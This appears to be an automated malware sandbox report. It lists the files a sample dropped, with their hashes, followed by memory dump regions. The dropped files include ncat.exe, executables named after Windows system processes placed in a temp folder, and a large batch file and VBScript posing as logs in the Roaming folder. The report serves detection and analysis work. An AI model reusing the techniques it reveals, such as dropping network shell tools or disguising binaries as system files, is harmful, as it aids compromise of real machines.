314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3

SHA512
5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\$TMP~.bat

Filesize
135B

MD5
6bf11eb7e2ca37624f85d163b2a3f866

SHA1
00a65cddc32344d3b15b6bca4315ff692524494b

SHA256
c4c7558e442c5f915fd6caf1290610ca2423dafca97ae05b1eac715f4267197b

SHA512
79c8ba8ad545244c9c3765f32f291ffe918d8af1bcf7b3d375fdfee70e39ae4a548e25425ac3f2252276777a784a2ba5fd64f833b7776a413d4cabc3932272e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nr21vd2g.g5x.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcrypto-3.dll

Filesize
3.9MB

MD5
27c8a62563e3f34f3466d3cbf4b8fe74

SHA1
23a2585b4afa8e77d365fb1bcf8c96d7273b9742

SHA256
3927d87e03ad83e22a40fdcb680707a28eb04314af51f228130d8396dabb3de4

SHA512
c24f2725a05b209895e4de7b548fc7782d5695bcadc6b79a742c9860efa4691f4cb0b997bb1035b379c64de9d5476e6425e1e76e0b6d73faee635e7fc87207d1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libssl-3.dll

Filesize
661KB

MD5
24f02f8bd55813c87a4952e60e87edf1

SHA1
c19834e2d64dd44d84d58c73d88b454fd6ccb385

SHA256
70b3b431d10ca9dea42b5b5aca85a97c39c91e0e2e3b5763514c1608a5f980b3

SHA512
04922a3a80d551cfada9fcb765966eeca0741bfff3469a551d538580b64a70d8f1a6a94abada3762a79cd6fd2222eb38c9e491a74fc19937bbd8ab309770f7ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\ncat.exe

Filesize
355KB

MD5
4f6b1c5a41f7e9d183a7dd3ace65812e

SHA1
c08a5e5c59f39522939284ee8743ff55967da76a

SHA256
a3071223a56a18c9fb913696487f69d1ea2633176412446d4b7eecc82d33c262

SHA512
25c7a3f16b001144cc8fdc5c9014cdfe33352bd76c116c3e1b7e3238668ae0b284fc641b96aee92d07dc9a25fa9b016e441db96c07f2426e09b0ec9b8d2443cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\zvgfd-main\7zip.exe

Filesize
65KB

MD5
aa4404671315c6f141a264b628d05052

SHA1
5e1b52fd1b3ce93f82c35b8e07c08774003dd422

SHA256
d09701eb2589607f7827408b297ce94f8f3f9afcbc77a8f098cac2df6ccb8d18

SHA512
5a8e8398e126d760f5486de6fae139f3e597f26da2eccc89234c32131c352259a4b8cd19596ab58dd45ca66356f89290cbdb74d7e8b7daee1af73204fda08eca

Download Submit
C:\Users\Admin\AppData\Local\Temp\zvgfd-main\WinRunner.exe

Filesize
10.2MB

MD5
4758850f5686ee8da4e930c97d6caca2

SHA1
190f3d1b98411cc586546780a59d7c5730ab3d64

SHA256
cdd06b27fd62b93abf2eadf7ad388fca617951a834c612862a5ee3c0c2cd72a3

SHA512
c764ebd03544b5073577e2d5f84d8134d119b78a41179f24092cd9051f6396fcff639131c3e27617e0f40030f1af0d9e02a3f7d62e2987edbc4c9e26bbd3a1af

Download Submit
C:\Users\Admin\AppData\Local\Temp\zvgfd-main\conhost.exe

Filesize
63KB

MD5
c8be6e344fd58475e1cfe3bf12e69380

SHA1
da41de66884faeccc83283accc0d23a722915774

SHA256
ccd4b5bf3a42a5006ced7f25a17765b778c17c6bb28a488dd466d493709cdec0

SHA512
46639ab300a492f1d7783a27a349674a22b112b26a77e5ee7c3f910b88f2fa4f8e581b72e3e4632b4bdf7a04d63d1e3153a8989b2974bc4bdca985576c71cea8

Download Submit
C:\Users\Admin\AppData\Local\Temp\zvgfd-main\wininit.exe

Filesize
409KB

MD5
ba300d38cfdf1c73eddcd7a1ac589b78

SHA1
c8741781f775f51dbf559ae783adcd762b036946

SHA256
e35f07e7fab453e5366f8f220d8302f31dc134aebc71fedc6beb113c9706961f

SHA512
19274f0742d4e82c3f184ec264bb8f9d4fd3c7092b51ec63b727c3ab33ef70cd36805f1f7c52c663ff72496c79b827c23bfc547031f60e62dba396bdaaa50047

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_304.bat

Filesize
5.9MB

MD5
01132c50b0d844fab3b44bdb50be7445

SHA1
c1212c8576c7794a2bbcf86f6a5bbd212fa23994

SHA256
874cd778f30a84b531ed0811536dd64fdf3259db9509116f3eb3414127a4e0bf

SHA512
96be33e08ca7a4b7331f96488182d999d94a57923d70d6af0acda64795e3c4fc5cab55b16661af48832b63ea38bf39a40dfe636f479709e0d4afb723ac3d9c31

Download Submit
C:\Users\Admin\AppData\Roaming\Windows_Log_304.vbs

Filesize
115B

MD5
f3d9b854795ba6d6ee0f843094ef2e1c

SHA1
78023dcaf3cc182718bb4f8069003f621ee43cab

SHA256
e9847bf90ed0514036cf202cf5cb0cac60efb44da08649be9614c4a83c92eaa5

SHA512
6573b8f313208b51995b459cf5be14b95377de64136a640b79554762edc2451e2aa9068615738ef0e72630fdd79043146598056591da49483ec95e29ee93bd75

Download Submit
memory/1784-95-0x0000000000F20000-0x0000000000F36000-memory.dmp

Filesize
88KB

Download
memory/1988-29-0x00007FFB4A040000-0x00007FFB4AB01000-memory.dmp

Filesize
10.8MB

Download
memory/1988-32-0x00007FFB4A040000-0x00007FFB4AB01000-memory.dmp

Filesize
10.8MB

Download
memory/1988-27-0x00007FFB4A040000-0x00007FFB4AB01000-memory.dmp

Filesize
10.8MB

Download
memory/1988-28-0x00007FFB4A040000-0x00007FFB4AB01000-memory.dmp

Filesize
10.8MB

Download
memory/2448-59-0x000001CD25720000-0x000001CD2573A000-memory.dmp

Filesize
104KB

Download
memory/2612-121-0x00000000057F0000-0x0000000005802000-memory.dmp

Filesize
72KB

Download
memory/2612-120-0x0000000004BD0000-0x0000000004C36000-memory.dmp

Filesize
408KB

Download
memory/2612-114-0x0000000005010000-0x00000000055B4000-memory.dmp

Filesize
5.6MB

Download
memory/2612-102-0x0000000000070000-0x00000000000DC000-memory.dmp

Filesize
432KB

Download
memory/2612-146-0x0000000006300000-0x000000000630A000-memory.dmp

Filesize
40KB

Download
memory/2612-133-0x0000000005D30000-0x0000000005D6C000-memory.dmp

Filesize
240KB

Download
memory/2612-119-0x0000000004B30000-0x0000000004BC2000-memory.dmp

Filesize
584KB

Download
memory/3020-148-0x000000001C450000-0x000000001C45E000-memory.dmp

Filesize
56KB

Download
memory/3020-97-0x00000000004F0000-0x0000000000506000-memory.dmp

Filesize
88KB

Download
memory/3136-0-0x00007FFB4A043000-0x00007FFB4A045000-memory.dmp

Filesize
8KB

Download
memory/3136-50-0x00007FFB4A040000-0x00007FFB4AB01000-memory.dmp

Filesize
10.8MB

Download
memory/3136-14-0x0000015353450000-0x00000153534C6000-memory.dmp

Filesize
472KB

Download
memory/3136-15-0x0000015338BB0000-0x0000015338BB8000-memory.dmp

Filesize
32KB

Download
memory/3136-13-0x0000015353380000-0x00000153533C4000-memory.dmp

Filesize
272KB

Download
memory/3136-16-0x0000015373BC0000-0x0000015374694000-memory.dmp

Filesize
10.8MB

Download
memory/3136-12-0x00007FFB4A040000-0x00007FFB4AB01000-memory.dmp

Filesize
10.8MB

Download
memory/3136-11-0x00007FFB4A040000-0x00007FFB4AB01000-memory.dmp

Filesize
10.8MB

Download
memory/3136-10-0x0000015352F90000-0x0000015352FB2000-memory.dmp

Filesize
136KB

Download
memory/4544-103-0x0000018653FE0000-0x0000018654A0C000-memory.dmp

Filesize
10.2MB

Download